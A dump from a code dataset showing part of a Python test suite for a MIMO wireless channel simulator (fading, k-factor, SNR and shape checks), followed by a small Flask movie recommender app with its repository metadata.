chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
prod_nb = nb_tx * nb_rx
for mod in self.real_mods:
with assert_raises(ValueError):
chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))
chan.fading_param = (zeros((nb_rx, nb_tx)), identity(nb_tx), identity(nb_rx))
check_chan_gain(mod, chan)
mean = randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rt, Rr)
check_chan_gain(mod, chan)
chan.uncorr_rayleigh_fading(float)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with uncorrelated Rayleigh fading')
mean = randn(nb_rx, nb_tx)
chan.uncorr_rician_fading(mean, 10)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with uncorrelated rician fading')
for mod in self.all_mods:
with assert_raises(ValueError):
chan.fading_param = (ones((nb_tx, nb_tx)), ones((nb_tx, nb_tx)), ones((nb_rx, nb_rx)))
chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(), 0, atol=1e-2,
err_msg='Wrong channel mean with complex channel')
assert_allclose(chan.channel_gains.var(), 1, atol=5e-2,
err_msg='Wrong channel variance with complex channel')
mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rt = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rt, Rr)
check_chan_gain(mod, chan)
assert_allclose(chan.channel_gains.mean(0).real, mean.real, atol=0.1,
err_msg='Wrong channel mean with complex channel')
assert_allclose(chan.channel_gains.mean(0).imag, mean.imag, atol=0.1,
err_msg='Wrong channel mean with complex channel')
chan.uncorr_rayleigh_fading(complex)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with uncorrelated Rayleigh fading')
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.uncorr_rician_fading(mean, 10)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with uncorrelated rician fading')
chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi))
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with correlated Rayleigh fading')
Rt, Rr = expo_correlation(exp(-0.2j * pi), exp(-0.1j * pi))
check_correlation(chan, Rt, Rr)
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.expo_corr_rician_fading(mean, 10, exp(-0.1j * pi), exp(-0.2j * pi))
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 10,
err_msg='Wrong k-factor with correlated rician fading')
chan.expo_corr_rayleigh_fading(exp(-0.2j * pi), exp(-0.1j * pi), 1, 0.5)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 0,
err_msg='Wrong k-factor with correlated Rayleigh fading')
mean = randn(nb_rx, nb_tx) + randn(nb_rx, nb_tx) * 1j
chan.expo_corr_rician_fading(mean, 5, exp(-0.1j * pi), exp(-0.2j * pi), 3, 2)
check_chan_gain(mod, chan)
assert_allclose(chan.k_factor, 5,
err_msg='Wrong k-factor with correlated rician fading')
class TestMIMOSpectular(MIMOTestCase):
def __init__(self):
super(TestMIMOSpectular, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
with assert_raises(ValueError):
chan.specular_compo(0, -1, 0, 1)
with assert_raises(ValueError):
chan.specular_compo(0, 1, 0, -1)
desired = empty((nb_rx, nb_tx), dtype=complex)
for n in range(nb_rx):
for m in range(nb_tx):
desired[n, m] = exp(1j * 2 * pi * (n * 1 * cos(0.5) - m * 0.1 * cos(2)))
assert_allclose(chan.specular_compo(2, 0.1, 0.5, 1), desired, rtol=0.02,
err_msg='Wrong specular component')
@dec.slow
class TestMIMONoiseGeneration(MIMOTestCase):
def __init__(self):
super(TestMIMONoiseGeneration, self).__init__()
def do(self, nb_tx, nb_rx):
seed(17121996)
def check_noise(mod, chan, corrected_SNR_lin):
msg = choice(mod, self.msg_length)
chan.propagate(msg)
P_msg = signal_power(msg)
P_noise = signal_power(chan.noises)
assert_allclose(abs(chan.noises.mean()), 0., atol=0.5,
err_msg='Noise mean is not 0')
if corrected_SNR_lin == inf:
assert_allclose(P_noise, 0, atol=1e-2,
err_msg='There is noise that should not be here')
else:
assert_allclose(chan.nb_tx * P_msg / P_noise, corrected_SNR_lin, atol=0.2,
err_msg='Wrong SNR')
fading_param = zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx)
chan = MIMOFlatChannel(nb_tx, nb_rx, fading_param=fading_param)
for mod in self.all_mods:
chan.noise_std = 0
check_noise(mod, chan, inf)
chan.set_SNR_lin(6, Es=signal_power(mod))
check_noise(mod, chan, 6)
chan.set_SNR_lin(6, .5, signal_power(mod))
check_noise(mod, chan, 3)
chan.set_SNR_dB(0, Es=signal_power(mod))
check_noise(mod, chan, 1)
chan.set_SNR_dB(0, .5, signal_power(mod))
check_noise(mod, chan, .5)
class TestMIMOTypeCheck(MIMOTestCase):
def __init__(self):
super(TestMIMOTypeCheck, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
with assert_raises(TypeError):
chan.propagate(array((1, 1j)))
class TestMIMOShapes(MIMOTestCase):
def __init__(self):
super(TestMIMOShapes, self).__init__()
def do(self, nb_tx, nb_rx):
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
out = chan.propagate(ones(nb_tx * 2))
assert_array_equal(chan.channel_gains.shape, (2, nb_rx, nb_tx),
err_msg='Wrong channel shape without padding')
assert_array_equal(chan.noises.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
assert_array_equal(chan.unnoisy_output.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
assert_array_equal(out.shape, (2, nb_rx),
err_msg='Wrong channel shape without padding')
chan = MIMOFlatChannel(nb_tx, nb_rx, 0)
out = chan.propagate(ones(nb_tx * 2 + 1))
assert_array_equal(chan.channel_gains.shape, (3, nb_rx, nb_tx),
err_msg='Wrong channel shape with padding')
assert_array_equal(chan.noises.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
assert_array_equal(chan.unnoisy_output.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
assert_array_equal(out.shape, (3, nb_rx),
err_msg='Wrong channel shape with padding')
class TestMIMOkFactor(MIMOTestCase):
def __init__(self):
super(TestMIMOkFactor, self).__init__()
def do(self, nb_tx, nb_rx):
seed(17121996)
prod_nb = nb_tx * nb_rx
chan = MIMOFlatChannel(nb_tx, nb_rx)
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
mean = randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = mean, Rs, Rr
assert_allclose(chan.k_factor, 3,
err_msg='Wrong k-factor with rician fading in SISO channels')
chan.fading_param = (zeros((nb_rx, nb_tx), complex), identity(nb_tx), identity(nb_rx))
assert_allclose(chan.k_factor, 0,
err_msg='k-factor should be 0 with Rayleigh fading in SISO channels')
mean = randn(nb_rx, nb_tx) + 1j * randn(nb_rx, nb_tx)
mean *= sqrt(prod_nb * 0.75 / einsum('ij,ij->', absolute(mean), absolute(mean)))
Rs = self.random_SDP_matrix(nb_tx) * sqrt(prod_nb) * 0.5
Rr = self.random_SDP_matrix(nb_rx) * sqrt(prod_nb) * 0.5
chan.fading_param = (mean, Rs, Rr)
assert_allclose(chan.k_factor, 3,
err_msg='Wrong k-factor with rician fading in SISO channels')
if __name__ == "__main__":
run_module_suite()
| true | true |
f72332b713eea64f27d550219316fa52fa69d638 | 2,397 | py | Python | movieapp/application.py | Ketank21/Movie_recommendation | 444e85669689cc0d86c0aa11d708eaad17e6115b | [
"MIT"
] | null | null | null | movieapp/application.py | Ketank21/Movie_recommendation | 444e85669689cc0d86c0aa11d708eaad17e6115b | [
"MIT"
] | null | null | null | movieapp/application.py | Ketank21/Movie_recommendation | 444e85669689cc0d86c0aa11d708eaad17e6115b | [
"MIT"
] | null | null | null | '''
root module of the recommender app
'''
from flask import Flask, request, render_template
from recommender import recommend_nmf, recommend_random,recommend_neighbors,recommend_popular
from utils import movies,ratings,df_mov_avg_cnt, search_title,movie_to_id,id_to_movie,get_movieId
#where we define our Flask object to be used to render our views
app = Flask(__name__) # __name__ defines this script as the root of our movieapp
# decorator that routes the function to a specified URL
@app.route('/')
def landing_page():
'''
User lands on this page and enters query
'''
return render_template('landing_page.html')
@app.route('/my-awesome-recommender/')
def recommender():
'''
queries accessed and transformed into recommendations
'''
print(request.args) # accesses the user query, prints in temrinal
# example query for the .getlist method: ?q=star+wars&q=godfather&q=get+shorty
print(request.args.getlist('q')) # accesses the user query as a list
choice = request.args.get('choice')
# string input received from the user of the website
userquery = request.args.getlist('movie')
userquery_to_movieId=get_movieId(userquery)
# TODO: convert user input into moveIds
# - option 1: assume that user knows the movieIds: convert strings to integers (Erkan)
# - option 2: use fuzzy string to match user input with exact titles from the movies table (Tosin)
if choice == 'Random':
recs = recommend_random(userquery_to_movieId, k=5)
elif choice == 'Tailored':
recs = recommend_nmf(userquery_to_movieId,k=5)
elif choice == 'people like you':
recs = recommend_neighbors(userquery_to_movieId,k=5)
elif choice == 'popular':
recs = recommend_popular(userquery_to_movieId,k=5)
# query must be a list of moveieIds
# recs = recommend_random(userquery_to_movieId, k=3)
return render_template('recommender.html', recs=recs, choice=choice)
# parameterized URL
@app.route('/movie/<int:movieId>')
def movie_info(movieId):
'''
page for individual movie information
'''
movie=movies.set_index('movieId').loc[movieId]
return render_template('movie_info.html', movie=movie, movieId=movieId)
if __name__ == '__main__':
# debug = True restarts servers after edits and prints verbose errors in terminal
app.run(debug=True)
| 34.242857 | 102 | 0.71506 |
from flask import Flask, request, render_template
from recommender import recommend_nmf, recommend_random,recommend_neighbors,recommend_popular
from utils import movies,ratings,df_mov_avg_cnt, search_title,movie_to_id,id_to_movie,get_movieId
app = Flask(__name__)
@app.route('/')
def landing_page():
return render_template('landing_page.html')
@app.route('/my-awesome-recommender/')
def recommender():
print(request.args)
print(request.args.getlist('q'))
choice = request.args.get('choice')
userquery = request.args.getlist('movie')
userquery_to_movieId=get_movieId(userquery)
if choice == 'Random':
recs = recommend_random(userquery_to_movieId, k=5)
elif choice == 'Tailored':
recs = recommend_nmf(userquery_to_movieId,k=5)
elif choice == 'people like you':
recs = recommend_neighbors(userquery_to_movieId,k=5)
elif choice == 'popular':
recs = recommend_popular(userquery_to_movieId,k=5)
return render_template('recommender.html', recs=recs, choice=choice)
@app.route('/movie/<int:movieId>')
def movie_info(movieId):
movie=movies.set_index('movieId').loc[movieId]
return render_template('movie_info.html', movie=movie, movieId=movieId)
if __name__ == '__main__':
app.run(debug=True)
| true | true |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.